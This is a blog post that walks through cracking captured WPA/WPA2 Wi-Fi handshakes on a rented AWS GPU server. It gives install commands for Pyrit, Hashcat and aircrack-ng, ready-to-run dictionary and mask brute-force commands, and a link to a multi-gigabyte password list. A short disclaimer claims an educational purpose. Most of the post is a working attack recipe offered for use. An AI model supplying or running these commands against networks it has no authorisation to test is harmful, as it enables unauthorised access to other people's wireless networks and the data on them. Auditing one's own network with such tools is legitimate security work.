WPA/WPA2 Cracking with GPU in AWS

DISCLAIMER: The information provided on this post is to be used for educational purposes only. The website creator is in no way responsible for any misuse of the information provided. All of the information in this website is meant to help the reader develop a hacker defence attitude in order to prevent the attacks discussed. In no way should you use the information to cause any kind of damage directly or indirectly. You implement the information given at your own risk.

In this post we are going to realise how practical it is to perform a brute force attack on a WPA or WPA2 captured handshake. A couple of years ago WPA/WPA2 considered secure but with the current power and cost of cloud computing anyone with slightest interest can setup a super fast server for brute force attempts with very cheap price (as low as $0.6 per hour!).

I am going to walk through my experiment and share the details and results with you. There are dozens of tutorials for this out there but this is just my own little experiment.

Brute forcing a WPA or WPA2 password begins with capturing the 4way handshake of the target WiFi. I am not going to go there as you can find a lot of solutions for that! I can only mention Kali toolbox which provides you the tools. So we will assume you got the WPA 4way handshake in handshake.cap file.

Nvidia, have provided an Amazon Linux AMI with NVIDIA GRID GPU drivers installed. I used a g2.8xlarge which comes with 4GRID GPU cores, 32 CPU and 60GB RAM. It cost me $2.6 per hour in Oregon region.



AWS EC2 g2.8xlarge specification

AWS EC2 g2.8xlarge specification

Once you are done with launching the instance, you SSH and install the following dependencies:

sudo yum install python-devel openssl-devel zlib-devel libpcap-devel glibc-devel gcc make

Then we get to installing the required tools. There are 2 high performance tools for brute forcing which are known as Pyrit and Hashcat. Pyrit is designed for brute forcing WPA/WPA2 hashes while Hashcat is a more general tool. The performance depends on the requirements of your environment but my personal preference is Pyrit! Both of these tools have different packages for CUDA enabled systems.

Pyrit Benchmark with g2.8xlarge

Pyrit Benchmark with g2.8xlarge


Hashcat Benchmark with g2.8xlarge

Hashcat Benchmark with g2.8xlarge

There is another tool names Scapy that provide some functionalities for WPA/WPA2 protocol. Scapy is not used here but I just described the installation.

Pyrit (generic):

wget https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/pyrit/pyrit-0.4.0.tar.gz
tar xvzf pyrit-0.4.0.tar.gz
cd pyrit-0.4.0
python setup.py build
python setup.py install

Pyrit (CUDA):

wget https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/pyrit/cpyrit-cuda-0.4.0.tar.gz
tar xvzf cpyrit-cuda-0.4.0.tar.gz
cd cpyrit-cuda-0.4.0
vi setup.py


NVIDIA_INC_DIRS = ['/opt/nvidia/cuda/include']


python setup.py build
python setup.py install
ln -s /usr/local/bin/pyrit /usr/bin/pyrit
pyrit benchmark


wget http://www.secdev.org/projects/scapy/files/scapy-latest.zip
unzip scapy-latest.zip -d scapy
cd scapy/*/
python setup.py build
python setup.py install
ln -s /usr/local/bin/scapy /usr/bin/scapy

To use Pyrit you have the option to import the password and ESSID and let the Pyrit run a batch against all ESSID:PASSWORD;

pyrit -i dictionary-file import_passwords
pyrit eval
pyrit -e 'target_essid' create_essid
pyrit batch

or just run the ESSID against a list of passwords:

pyrit -r handshake.cap.cap -o clean-handshake.cap strip
pyrit -r clean-handshake.cap -i dictionary-file attack_passthrough

You can find more info about Pyrit HERE. In case you are interested in Hashcat then you can check HERE.

The last thing to share is the dictionary (list of words). There are gigabytes of dictionaries out there but they might not be processed. The password for WPA/WPA2 is minimum 8 characters so Pyrit does a little processing to make the most efficient dictionary.

I am going to share a link (but again as I mention in disclaimer, I am only sharing information. You are fully responsible for how you use it.) with 3,902,508,361 unique WPA2 passwords HERE (27GB)

*If you used megatools you can do as below (make sure it is mega.co.nz and single quotation around link):

./megadl 'https://mega.co.nz/#F!vhNkjSoY!Ti5EwbjCNQjm-c_nL54rAQ'

Extract it with

tar xvd dic.tar.gz 

Once done you can move the password directory to this path:

And run “pyrit eval” to confirm the passwords are in use.


For using Hashcat you can install it as follow:

Hashcat (CUDA)

rpm -i http://pkgs.repoforge.org/p7zip/p7zip-9.20.1-1.el7.rf.x86_64.rpm
wget http://hashcat.net/files/cudaHashcat-2.01.7z
7za x cudaHashcat-2.01.7z
cd cudaHashcat-2.01
./cudaHashcat64.bin -b -m 2500

and for converting the cap files to readable hccap you should use aircrack-ng. You can download it as follow:

yum install -y git-svn libpcap-devel sqlite-devel gcc gcc-c++ libnl-devel openssl-devel usbutils pciutils rfkill wireless-tools glibc*

wget http://download.aircrack-ng.org/aircrack-ng-1.2-rc4.tar.gz
tar xvfz aircrack-ng-1.2-rc4.tar.gz
cd aircrack-ng-1.2-rc4
make install
ln -s /path_to_aircrack/aircrack-ng-1.2-rc4/src/aircrack-ng /usr/bin/aircrack-ng

Once installed you can convert the file and run hashcat:

aircrack-ng file.cap -J file.hccap
/path_to_hashcat/oclHashcat64.exe -m 2500 file.hccap words.dic

You can also run a bruteforce attack with custom combinations:

/path_to_hashcat/oclHashcat64.exe -m 2500 -a3 file.hccap ?d?d?d?d?d?d?d?d


>>> ERROR: cuModuleLoad() 301
*** Just run the commands inside the hashcat directory so the resources are accessible


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s